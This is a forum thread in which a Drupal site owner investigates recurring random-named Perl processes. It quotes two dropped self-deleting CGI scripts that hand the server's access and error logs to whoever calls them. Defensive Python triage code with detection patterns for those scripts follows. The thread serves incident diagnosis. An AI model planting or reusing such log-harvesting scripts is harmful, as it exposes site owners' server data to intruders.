Serious server process problem
Hello
I've got a Drupal based website that over the last week or so has been creating problems. I don't know (and don't think) that Drupal is the problem, but as my host has taken the website down, I urgently need to find out what the problem is. I'm sure you guys know more than I do, so I hope you can help me.
The Problem
Drupal Installation - Drupal 6, fully updated to latest version
Added modules - CCK, Webform, Views - all updated to latest versions
My hosting service sent me an email stating that a permanent server process had been detected as running and they had subsequently disabled scripting. This happened suddenly and not after any updates to Drupal at the core level. One of the site users has administrative access to Drupal, but has sworn to me that he has not touched anything, other than creating some pages, including some with the Google maps API and a Facebook page link (these have both been removed with no effect).
The host sent me the following information about the process the first time that it happened:
SYSTEM - 2009-06-22 06:55:02: Daemon: 16103 mywebsite.co.uk "perl" (/usr/bin/perl) (169 s)
(nwirgxg.pl )
The server then automatically disabled scripting and brought the site down.
The host put the site back up, but the process has happened again, reasonably frequently: it occurred twice in a row at 6:50:02 am on subsequent days. It has also happened during the daytime as a temporary process:
SYSTEM - 21/06/2009 21:35:02: Daemon: 7757 mywebsite.co.uk "perl" (/usr/bin/perl) (189 s)
(zbkwxk.pl )
Temporary scripting disable (no notification).
SYSTEM - 30/06/2009 22:05:02: Daemon: 1946 mywebsite.co.uk "perl" (/usr/bin/perl) (297 s)
(tphqehfd.pl )
Temporary scripting disable (no notification).
You can see a clear pattern that looks like something is scheduled to happen at 5 minutes 2 seconds past the hour or half-hour. As I stated earlier, it appeared out of the blue.
On one occasion, when the process ran, files appeared in the public_html folder that were labelled along the lines of ftpX5W9dF.cgi. The contents were like:
#!/usr/bin/perl -w
use strict;
unlink($0);    # remove this script from disk as soon as it starts running
print "Content-Type: text/html\n\n";
if(-d "../logs") {
    chdir "../logs" or die $!;    # Unix layout: log directory beside the web root
} else {
    # Windows/IIS layout: per-site log folder under inetpub
    my ($dir) = glob("c:\\inetpub\\logfiles\\mysite.co.uk\\*");
    chdir($dir) or die "$dir: $!";
}
# Send the last 100 lines of every access log (Apache and IIS naming) to the HTTP client
print "ACCESS\n";
for my $n (glob("*-access_log"), glob("u_*.log")) {
    system("tail", "-100", $n);
}
# Same for the error logs
print "ERROR\n";
for my $n (glob("*-error_log")) {
    system("tail", "-100", $n);
}
Another:
#!/usr/bin/perl
unlink($0);    # remove this script from disk as soon as it starts running
use strict;
print "Content-Type: application/octet-stream\n\n";    # response is a binary download
if(-d "../logs") {
    chdir "../logs" or die $!;    # Unix layout: log directory beside the web root
} else {
    # Windows/IIS layout: per-site log folder under inetpub
    my ($dir) = glob("c:\\inetpub\\logfiles\\mysite.co.uk\\*");
    chdir($dir) or die "$dir: $!";
}
# Zip the whole log directory and stream it back to the HTTP client
use Archive::Zip;
my $zip = Archive::Zip->new();
$zip->addTree( '.' );
$zip->writeToFileHandle( \*STDOUT);
I also had Webalizer installed in a folder, but I have since removed that. If anyone has any suggestions as to what might be up, or at least what I should do next, I would be very grateful.
Thanks
Matt
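The host notices and the two dropped scripts quoted in the post above are enough to build a small triage tool. The block below is an added example, not code from the original post or from the hosting company: it parses the "SYSTEM - ... Daemon:" notice lines (both date styles seen in the thread), subtracts the reported runtime to estimate when each process started (assuming the "(169 s)" figure is elapsed running time at the moment of detection), and scans a web root for .pl/.cgi files that either have a random-looking name or show the behaviours of the quoted scripts (self-delete with unlink($0), chdir into the log directory, tail or zip the logs). The notice lines and script contents embedded in it are constructed to mirror those in the thread; the name test and the indicator list are heuristics chosen here, not an established signature.

```python
"""Triage helpers for the host notices and dropped Perl scripts quoted above.
Added example, not from the original post or the host; the sample notices and
script contents are constructed, and the checks are heuristics chosen here."""
import re
import tempfile
from datetime import datetime, timedelta
from pathlib import Path

# One host notice as quoted in the post; both date styles in the thread
# (2009-06-22 and 21/06/2009) are accepted.
NOTICE_RE = re.compile(
    r'SYSTEM - (?P<ts>\S+ \d\d:\d\d:\d\d): Daemon: (?P<pid>\d+) (?P<host>\S+) '
    r'"(?P<proc>[^"]+)" \((?P<path>[^)]+)\) \((?P<secs>\d+) s\)')
SCRIPT_RE = re.compile(r'^\((?P<script>\S+) ?\)$')

# Behaviours of the two scripts quoted in the post: delete self, move into the
# web server's log directory, then ship log content back to the HTTP client.
INDICATORS = {
    'self_delete': re.compile(r'unlink\s*\(\s*\$0\s*\)'),
    'enters_log_dir': re.compile(r'chdir\s*\(?\s*["\']\.\./logs|inetpub\\+logfiles', re.I),
    'tails_logs': re.compile(r'system\s*\(\s*"tail"'),
    'zips_tree': re.compile(r'Archive::Zip|addTree'),
}


def parse_notices(text):
    """Pair each 'SYSTEM - ... Daemon:' line with the '(script.pl )' line after
    it. 'seen' is when the host noticed the process; 'started' subtracts the
    reported runtime (assumption: the '(169 s)' figure is elapsed run time)."""
    events, pending = [], None
    for line in text.splitlines():
        line = line.strip()
        m = NOTICE_RE.match(line)
        if m:
            ts = m.group('ts')
            fmt = '%Y-%m-%d %H:%M:%S' if '-' in ts else '%d/%m/%Y %H:%M:%S'
            seen, secs = datetime.strptime(ts, fmt), int(m.group('secs'))
            pending = {'pid': int(m.group('pid')), 'proc': m.group('proc'),
                       'seen': seen, 'runtime': secs,
                       'started': seen - timedelta(seconds=secs)}
            continue
        s = SCRIPT_RE.match(line)
        if s and pending is not None:
            pending['script'] = s.group('script')
            events.append(pending)
            pending = None
    return events


def looks_random(name):
    """Heuristic: the dropped names in the thread (nwirgxg, zbkwxk, tphqehfd,
    ftpX5W9dF) are consonant-heavy stems, unlike index.cgi or webalizer."""
    stem = name.rsplit('.', 1)[0]
    letters = [c for c in stem if c.isalpha()]
    if len(stem) < 5 or not letters:
        return False
    return sum(c.lower() in 'aeiou' for c in letters) / len(letters) < 0.25


def score_dropper(source):
    """Names of the behavioural indicators present in a script's source."""
    return sorted(k for k, rx in INDICATORS.items() if rx.search(source))


def find_droppers(webroot, min_hits=2):
    """Walk a web root; report .pl/.cgi files that have a random-looking name
    or at least min_hits indicators, as (relative path, hits) pairs."""
    root, found = Path(webroot), []
    for p in root.rglob('*'):
        if not p.is_file() or p.suffix not in ('.pl', '.cgi'):
            continue
        hits = score_dropper(p.read_text(errors='replace'))
        if looks_random(p.name) or len(hits) >= min_hits:
            found.append((str(p.relative_to(root)), hits))
    return sorted(found)


# Constructed samples mirroring the thread (not real captured data).
SAMPLE_NOTICES = """\
SYSTEM - 2009-06-22 06:55:02: Daemon: 16103 mywebsite.co.uk "perl" (/usr/bin/perl) (169 s)
(nwirgxg.pl )
SYSTEM - 21/06/2009 21:35:02: Daemon: 7757 mywebsite.co.uk "perl" (/usr/bin/perl) (189 s)
(zbkwxk.pl )
SYSTEM - 30/06/2009 22:05:02: Daemon: 1946 mywebsite.co.uk "perl" (/usr/bin/perl) (297 s)
(tphqehfd.pl )
"""
SAMPLE_DROPPER = '''#!/usr/bin/perl -w
use strict;
unlink($0);
print "Content-Type: text/html\\n\\n";
if(-d "../logs") { chdir "../logs" or die $!; }
for my $n (glob("*-access_log")) { system("tail", "-100", $n); }
'''
SAMPLE_BENIGN = '#!/usr/bin/perl\nprint "Content-Type: text/html\\n\\n<p>hi</p>\\n";\n'


def demo_scan():
    """Drop the samples into a scratch web root and return what gets flagged."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / 'ftpX5W9dF.cgi').write_text(SAMPLE_DROPPER)
        (Path(d) / 'contact.cgi').write_text(SAMPLE_BENIGN)
        return find_droppers(d)


if __name__ == '__main__':
    for e in parse_notices(SAMPLE_NOTICES):
        print(e['seen'], e['script'], 'started about', e['started'].time())
    print(demo_scan())
```

Two caveats when running this against a real account: every quoted script calls unlink($0) first, so a scan taken after the host's notice will usually find nothing and the useful evidence is the access-log request that created or invoked the .cgi file, together with the account's crontab; and the vowel-ratio name test is only a triage hint (it will also flag legitimate consonant-heavy names such as xmlrpc if you widen the scan beyond .pl/.cgi).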

> nwirgxg.pl
> zbkwxk.pl
> tphqehfd.pl
> ftpX5W9dF.cgi
I'm fairly sure that random filenames are synonymous with being hacked.
Thanks - that's what I was thinking as well.